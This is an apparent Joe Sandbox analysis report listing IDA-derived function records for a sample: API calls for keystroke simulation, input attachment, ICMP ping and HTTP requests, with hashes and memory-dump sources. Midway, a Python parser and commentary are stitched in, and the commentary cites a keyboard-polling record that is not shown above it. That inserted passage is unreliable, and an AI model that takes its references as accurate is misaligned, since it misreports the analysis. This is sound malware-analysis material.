                                        • Opcode ID: e3e506116ee503f3d01bda3384fd5fd6e89c6f8df479c1d762966bf9f62574d9
                                        • Instruction ID: 58c85bab98bd2c90cc0d12bef2227b17cd63ccbaf1f7e9e3791da3ceba467cca
                                        • Opcode Fuzzy Hash: e3e506116ee503f3d01bda3384fd5fd6e89c6f8df479c1d762966bf9f62574d9
                                        • Instruction Fuzzy Hash: 5F71D131500209DFCF23CF64CC85AEA7BB9FF49350F198669ED56AA2A6C7318C41DB61
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 003786F5
                                        • inet_addr.WS2_32(?), ref: 0037873A
                                        • gethostbyname.WS2_32(?), ref: 00378746
                                        • IcmpCreateFile.IPHLPAPI ref: 00378754
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003787C4
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003787DA
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0037884F
                                        • WSACleanup.WS2_32 ref: 00378855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: c351cee7d092c052e4725e379965836e879c09b37d639600248d4970b9f106a5
                                        • Instruction ID: dae472d24318b5849664bc55b8f73eeabddba6301253cb0b3d1f01ab9000248a
                                        • Opcode Fuzzy Hash: c351cee7d092c052e4725e379965836e879c09b37d639600248d4970b9f106a5
                                        • Instruction Fuzzy Hash: C451A631644200AFD722DF24DD89B2AB7E8EF49710F158529F55ADB2A1DF34ED00CB42
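The records above (the GetAsyncKeyState/GetKeyState polling function and the IcmpSendEcho function, for instance) are easy to read one at a time but awkward to compare across samples or to feed into clustering by API String ID or opcode fuzzy hash. As an added example, not Joe Sandbox tooling and not part of this report, the Python below parses these IDA plugin records into dictionaries keyed by the report's own labels, then asks the questions an analyst asks of them: which records call a given API, which virtual keys a record polls, and what timeout the IcmpSendEcho call uses. The sample input is two records copied from this report and trimmed (constructed sample, "Download File" link residue omitted); parse_records, find_callers, polled_keys and icmp_timeouts_ms are my names, and the VK_* labels are the standard Windows virtual-key constants for the argument values that appear in the report.

```python
"""Parse Joe Sandbox IDA-plugin function records (APIs / Similarity blocks).
Added example for this report, not Joe Sandbox's own tooling; dict keys are
derived from the report's labels, helper names are my own choice."""
import re

# Two records copied from this report and trimmed (constructed sample input).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00363591
• GetAsyncKeyState.USER32(000000A0), ref: 00363612
• GetKeyState.USER32(000000A0), ref: 0036362D
• GetAsyncKeyState.USER32(00000011), ref: 00363674
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode Fuzzy Hash: 863981ee86a5dc6952adf5abe71339867e8610057e2e34fbd340e44ac75fca04
APIs
• WSAStartup.WS2_32(00000101,?), ref: 003786F5
• IcmpCreateFile.IPHLPAPI ref: 00378754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003787C4
• WSACleanup.WS2_32 ref: 00378855
Strings
Memory Dump Source
• Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode Fuzzy Hash: c351cee7d092c052e4725e379965836e879c09b37d639600248d4970b9f106a5
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no arg list),
# optionally prefixed with "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-F]+):\s*)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9_]+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Label: value"
SECTIONS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# Windows virtual-key codes for the values passed to Get(Async)KeyState above.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0x5B: "VK_LWIN"}


def parse_api_line(line):
    m = API_RE.match(line)
    if not m:
        return None
    subcall, name, module, args, ref = m.groups()
    return {"name": name, "module": module,
            "args": args.split(",") if args else [],
            "ref": int(ref, 16), "subcall": int(subcall, 16) if subcall else None}


def parse_records(text):
    """One dict per function record; a record starts at each 'APIs' line."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "strings": []}
            records.append(cur)
            section = "APIs"
        elif line in SECTIONS:
            section = line
        elif cur is None:
            continue                                    # text before the first record
        elif section == "APIs":
            api = parse_api_line(line)
            if api:
                cur["apis"].append(api)
        elif section == "Strings":
            cur["strings"].append(line.lstrip("• "))
        else:                                           # "• Label: value" metadata
            m = FIELD_RE.match(line)
            if m:
                key = m.group(1).strip().lower().replace(" ", "_")
                val = m.group(2).strip()
                if key in cur:                          # repeated labels (e.g. Associated:) become a list
                    cur[key] = (cur[key] if isinstance(cur[key], list) else [cur[key]]) + [val]
                else:
                    cur[key] = val
    return records


def find_callers(records, api_name):
    """Indices of records whose API list contains api_name."""
    return [i for i, r in enumerate(records) if any(a["name"] == api_name for a in r["apis"])]


def polled_keys(record):
    """Virtual keys passed to GetAsyncKeyState/GetKeyState, in call order, deduplicated."""
    seen = []
    for a in record["apis"]:
        if a["name"] in ("GetAsyncKeyState", "GetKeyState") and a["args"] and a["args"][0] != "?":
            vk = int(a["args"][0], 16)
            label = VK_NAMES.get(vk, "VK_0x%X" % vk)
            if label not in seen:
                seen.append(label)
    return seen


def icmp_timeouts_ms(record):
    """Timeout (8th IcmpSendEcho parameter, milliseconds) for each call with a resolved value."""
    return [int(a["args"][7], 16) for a in record["apis"]
            if a["name"] == "IcmpSendEcho" and len(a["args"]) == 8 and a["args"][7] != "?"]
```

Run it over the full execution-graph text of a report and the same parser gives you every record's API String ID and opcode fuzzy hash; those two fields are what let you match a function against another sample's report without re-running IDA.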
                                        APIs
                                        • _memset.LIBCMT ref: 00389C68
                                        • CreateMenu.USER32 ref: 00389C83
                                        • SetMenu.USER32(?,00000000), ref: 00389C92
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00389D1F
                                        • IsMenu.USER32(?), ref: 00389D35
                                        • CreatePopupMenu.USER32 ref: 00389D3F
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00389D70
                                        • DrawMenuBar.USER32 ref: 00389D7E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                        • String ID: 0
                                        • API String ID: 176399719-4108050209
                                        • Opcode ID: 3c93e23d65877d14f0bb9b4cf6df2098c7a38a72a285067c7a816b53d72fbe78
                                        • Instruction ID: 00ecba337435db9322b0c0dab2e2d34d61fe32b830088e47ce5f2644ffa05312
                                        • Opcode Fuzzy Hash: 3c93e23d65877d14f0bb9b4cf6df2098c7a38a72a285067c7a816b53d72fbe78
                                        • Instruction Fuzzy Hash: CB414875A00209AFDB22EF64D884BEA7BB9FF49304F190459E946AB361D730A914CF64
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036EC1E
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0036EC94
                                        • GetLastError.KERNEL32 ref: 0036EC9E
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0036ED0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 3a02331cc219e0740457b4c9574c977814a5987c978d11975882645475ac7773
                                        • Instruction ID: f4fbdc25d47c4bdfa348fd48844b43294189c103897b5199e0c5eeecd7893b26
                                        • Opcode Fuzzy Hash: 3a02331cc219e0740457b4c9574c977814a5987c978d11975882645475ac7773
                                        • Instruction Fuzzy Hash: 1E31A13AA002099FC713EF68D945EEEB7B8FF45700F118026F502EB295DA719E45CB91
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00388CF3
                                        • GetDC.USER32(00000000), ref: 00388CFB
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00388D06
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00388D12
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00388D4E
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00388D5F
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00388D99
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00388DB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID: @U=u
                                        • API String ID: 3864802216-2594219639
                                        • Opcode ID: 4783d530e4560f2ee655f6616cb670aa84f891e8bca0cd9b523eff9f8da81e80
                                        • Instruction ID: d2ee11317a06f995906d2183b91650153b1aa006d9a6700a326a304f202de307
                                        • Opcode Fuzzy Hash: 4783d530e4560f2ee655f6616cb670aa84f891e8bca0cd9b523eff9f8da81e80
                                        • Instruction Fuzzy Hash: 1D318B72200210BBEB129F54CC8AFEA3BADEF4A711F054055FE099A191CAB59841CB70
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0036B137
                                        Similarity
                                        • API ID: ArraySafeVartype
                                        • String ID:
                                        • API String ID: 1725837607-0
                                        • Opcode ID: 9f0450e1f257204fe6fb90935152f76c41de3a11b19e576ab341a5ffcd2ae56c
                                        • Instruction ID: 2e68b893e102d5cbb6e899c86462500f0c7690eddf21e82fa090e236382888b6
                                        • Opcode Fuzzy Hash: 9f0450e1f257204fe6fb90935152f76c41de3a11b19e576ab341a5ffcd2ae56c
                                        • Instruction Fuzzy Hash: 4EC17D75A0021ADFDB06CF98C491BAEB7F4EF09315F20806AE616EB351D734A981CF90
                                        APIs
                                        • __lock.LIBCMT ref: 0034BA74
                                          • Part of subcall function 00348984: __mtinitlocknum.LIBCMT ref: 00348996
                                          • Part of subcall function 00348984: RtlEnterCriticalSection.NTDLL(00340127), ref: 003489AF
                                        • __calloc_crt.LIBCMT ref: 0034BA85
                                          • Part of subcall function 00347616: __calloc_impl.LIBCMT ref: 00347625
                                          • Part of subcall function 00347616: Sleep.KERNEL32(00000000,?,00340127,?,0032125D,00000058,?,?), ref: 0034763C
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0034BAA0
                                        • GetStartupInfoW.KERNEL32(?,003D6990,00000064,00346B14,003D67D8,00000014), ref: 0034BAF9
                                        • __calloc_crt.LIBCMT ref: 0034BB44
                                        • GetFileType.KERNEL32(00000001), ref: 0034BB8B
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0034BBC4
                                        Similarity
                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1426640281-0
                                        • Opcode ID: bd1cd67c8fc2c71e088eb804281f984ae6bc0870cddd3aeae7a109d6b6648a23
                                        • Instruction ID: 8447ab4882c425e8ece969d788b866577e81f7484f9f7b18b40b596c919cbf8a
                                        • Opcode Fuzzy Hash: bd1cd67c8fc2c71e088eb804281f984ae6bc0870cddd3aeae7a109d6b6648a23
                                        • Instruction Fuzzy Hash: 0A8190719047458FDB26CF68C8C06A9BBF8EF49324B24425DD4A6AF3E1CB34E842CB55
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00364A7D
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364A91
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00364A98
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AA7
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00364AB9
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AD2
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AE4
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B29
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B3E
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B49
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: d18a8eae581a24197915a094568e47a62f46dd063139695c50874087666bb463
                                        • Instruction ID: 4609d3b353dda9cb1397771b154e20c6b72421ee230fbfa45da93a7fdb1b6615
                                        • Opcode Fuzzy Hash: d18a8eae581a24197915a094568e47a62f46dd063139695c50874087666bb463
                                        • Instruction Fuzzy Hash: 4F319172A00244BFDB239B64EC89BBD77ADEB91311F158105F906DB1A4D7B4DD408B60
                                        APIs
                                        • EnumChildWindows.USER32(?,0035DD46), ref: 0035DC86
                                        Strings
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: e4e0ce8f7668fa5e418bff15a88dfdd9e3feb507ceb981c0244090047acaaa0d
                                        • Instruction ID: 65d5a3757bd47bd7a6f14fafc9fa5a80c266963367d374616914a7a918d17d0d
                                        • Opcode Fuzzy Hash: e4e0ce8f7668fa5e418bff15a88dfdd9e3feb507ceb981c0244090047acaaa0d
                                        • Instruction Fuzzy Hash: 5091A330900506AACB1EDF64C4C1FEEFB75BF14301F55811AEC5AAB261DB70695DDB90
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003245F0
                                        • CoUninitialize.COMBASE ref: 00324695
                                        • UnregisterHotKey.USER32(?), ref: 003247BD
                                        • DestroyWindow.USER32(?), ref: 00395936
                                        • FreeLibrary.KERNEL32(?), ref: 0039599D
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003959CA
                                        Strings
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: ed2446da51a3da640a3f9a18a8602ada8399da703f67169b09e0f95800045f64
                                        • Instruction ID: fe4015ced2d8469a702766d6706afe447795296294db5a73ccf97a4bcc75e290
                                        • Opcode Fuzzy Hash: ed2446da51a3da640a3f9a18a8602ada8399da703f67169b09e0f95800045f64
                                        • Instruction Fuzzy Hash: A2914E34610622DFD71BEF14E895E69F3B8FF15700F5142A9E41AAB662DB30AE56CF00
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00389926
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0038993A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00389954
                                        • _wcscat.LIBCMT ref: 003899AF
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003899C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003899F4
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: @U=u$SysListView32
                                        • API String ID: 307300125-1908207174
                                        • Opcode ID: 71806031e4a87a476235decd0559173ac55bb722bfa363c1a2cbccfa8f60b697
                                        • Instruction ID: 6ca9c8ffee09a0af36b309e467ad6918749431905570db6b4fcda80dd8d83b88
                                        • Opcode Fuzzy Hash: 71806031e4a87a476235decd0559173ac55bb722bfa363c1a2cbccfa8f60b697
                                        • Instruction Fuzzy Hash: 4B41C171A00308AFEF229F64CC85FEE77A8EF08350F15046AF589A7291C77599848B60
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00374C5E
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00374C8A
                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00374CCC
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00374CE1
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00374CEE
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00374D1E
                                        • InternetCloseHandle.WININET(00000000), ref: 00374D65
                                          • Part of subcall function 003756A9: GetLastError.KERNEL32(?,?,00374A2B,00000000,00000000,00000001), ref: 003756BE
                                        Strings
                                        Similarity
                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1241431887-3916222277
                                        • Opcode ID: 3e4dd7e6be7f1932dff8256de8696234c056d7595388552aa5da229ac00b3ec2
                                        • Instruction ID: e2f87afd80374590d6d7b9f5a4f12c9983f3c68c18e3f0523c8ed5fe21fee3f3
                                        • Opcode Fuzzy Hash: 3e4dd7e6be7f1932dff8256de8696234c056d7595388552aa5da229ac00b3ec2
                                        • Instruction Fuzzy Hash: AC41A1B1501218BFEB279F64CC85FFB77ACEF09354F00811AFA099A151D778AD448BA0
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00388DF4
                                        • GetWindowLongW.USER32(017D9720,000000F0), ref: 00388E27
                                        • GetWindowLongW.USER32(017D9720,000000F0), ref: 00388E5C
                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00388E8E
                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00388EB8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00388EC9
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00388EE3
                                        Strings
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID: @U=u
                                        • API String ID: 2178440468-2594219639
                                        • Opcode ID: 7b674351ba52884a09dfa8bc46dc2b0a819491206ccde86cb6ca75074130c3c4
                                        • Instruction ID: 2eefe1c2524f78c0665fe239fd8a04dcb67cd18006e19436bdd77bd5a16005f1
                                        • Opcode Fuzzy Hash: 7b674351ba52884a09dfa8bc46dc2b0a819491206ccde86cb6ca75074130c3c4
                                        • Instruction Fuzzy Hash: C031F131600251AFDB22EF58DD84F9537E9FB4A714F9A52A4F5068F2B2CBB1AC40DB41
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003BDBF0), ref: 0037BBA1
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003BDBF0), ref: 0037BBD5
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0037BD33
                                        • SysFreeString.OLEAUT32(?), ref: 0037BD5D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0037BEAD
                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 0037BEF7
                                        • CoTaskMemFree.COMBASE(?), ref: 0037BF14
                                        Similarity
                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                        • String ID:
                                        • API String ID: 793797124-0
                                        • Opcode ID: 07dfb2fe02aef7e2f4cc5e956b28bc90db8b663c5d0b4fd6647bb5b4008622bb
                                        • Instruction ID: 3ff2fec2dc996e0acd741b8c7f4b9cba5f9f18e8d2ddf18ab7a240d6bc8e7c22
                                        • Opcode Fuzzy Hash: 07dfb2fe02aef7e2f4cc5e956b28bc90db8b663c5d0b4fd6647bb5b4008622bb
                                        • Instruction Fuzzy Hash: D2F11975A00109EFCF16DFA4C884EAEB7B9FF89714F118459F909AB250DB35AE41CB50
                                        APIs
                                          • Part of subcall function 003249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00324954,00000000), ref: 00324A23
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0033B85B), ref: 0033B926
                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0033B85B,00000000,?,?,0033AF1E,?,?), ref: 0033B9BD
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0039E775
                                        • DeleteObject.GDI32(00000000), ref: 0039E7EB
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        • Opcode ID: fe30366c01b9179810d4edfcedc5196ab91ad3af8dffced81b6bd814456815b8
                                        • Instruction ID: a0728d186ebc632f40a4db0aa11813c9ca57ac11cbd75d124d9efd224a858dae
                                        • Opcode Fuzzy Hash: fe30366c01b9179810d4edfcedc5196ab91ad3af8dffced81b6bd814456815b8
                                        • Instruction Fuzzy Hash: A6618631500751CFDB37DF65E8C8B2AB7F9FB46712F114629E2868AAB0C770A890CB40
                                        APIs
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0033F737
                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0033F77E
                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0039EB55
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0039EBC1
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 3b297b4606dd017677f5b8afc2fe6849cb2c096f908794e8a7f43b48c735de5e
                                        • Instruction ID: 2b23c674538d6852c386205f325174a7c0bbd3d61a9550e05e8f3a96d215bd65
                                        • Opcode Fuzzy Hash: 3b297b4606dd017677f5b8afc2fe6849cb2c096f908794e8a7f43b48c735de5e
                                        • Instruction Fuzzy Hash: 1C41FF31A08681DEDF3797388CC9B7A7A9D6B46385FE6092DF08B46D71C674E840D711
                                        APIs
                                          • Part of subcall function 0035E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0035E158
                                          • Part of subcall function 0035E138: GetCurrentThreadId.KERNEL32 ref: 0035E15F
                                          • Part of subcall function 0035E138: AttachThreadInput.USER32(00000000,?,0035CD34,?,00000001), ref: 0035E166
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE06
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0035CE23
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0035CE26
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE2F
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0035CE4D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0035CE50
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE59
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0035CE70
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0035CE73
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 6cfad99808b540104a872b05824b54464c3dff9cc77832e4985e62670804fe36
                                        • Instruction ID: d468cd79cc1c09278e30abba7311538e4fd79434b216ef6b251c54657c666ad7
                                        • Opcode Fuzzy Hash: 6cfad99808b540104a872b05824b54464c3dff9cc77832e4985e62670804fe36
                                        • Instruction Fuzzy Hash: E91104B1610618BEF7122F60CC8EF6A3A2DDB0E755F500415F3416B0F0CAF26D409AA4
                                        APIs
                                          • Part of subcall function 0035A857: CLSIDFromProgID.COMBASE ref: 0035A874
                                          • Part of subcall function 0035A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0035A88F
                                          • Part of subcall function 0035A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0035A89D
                                          • Part of subcall function 0035A857: CoTaskMemFree.COMBASE(00000000), ref: 0035A8AD
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0037C6AD
                                        • _memset.LIBCMT ref: 0037C6BA
                                        • _memset.LIBCMT ref: 0037C7D8
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0037C804
                                        • CoTaskMemFree.COMBASE(?), ref: 0037C80F
                                        Strings
                                        • NULL Pointer assignment, xrefs: 0037C85D
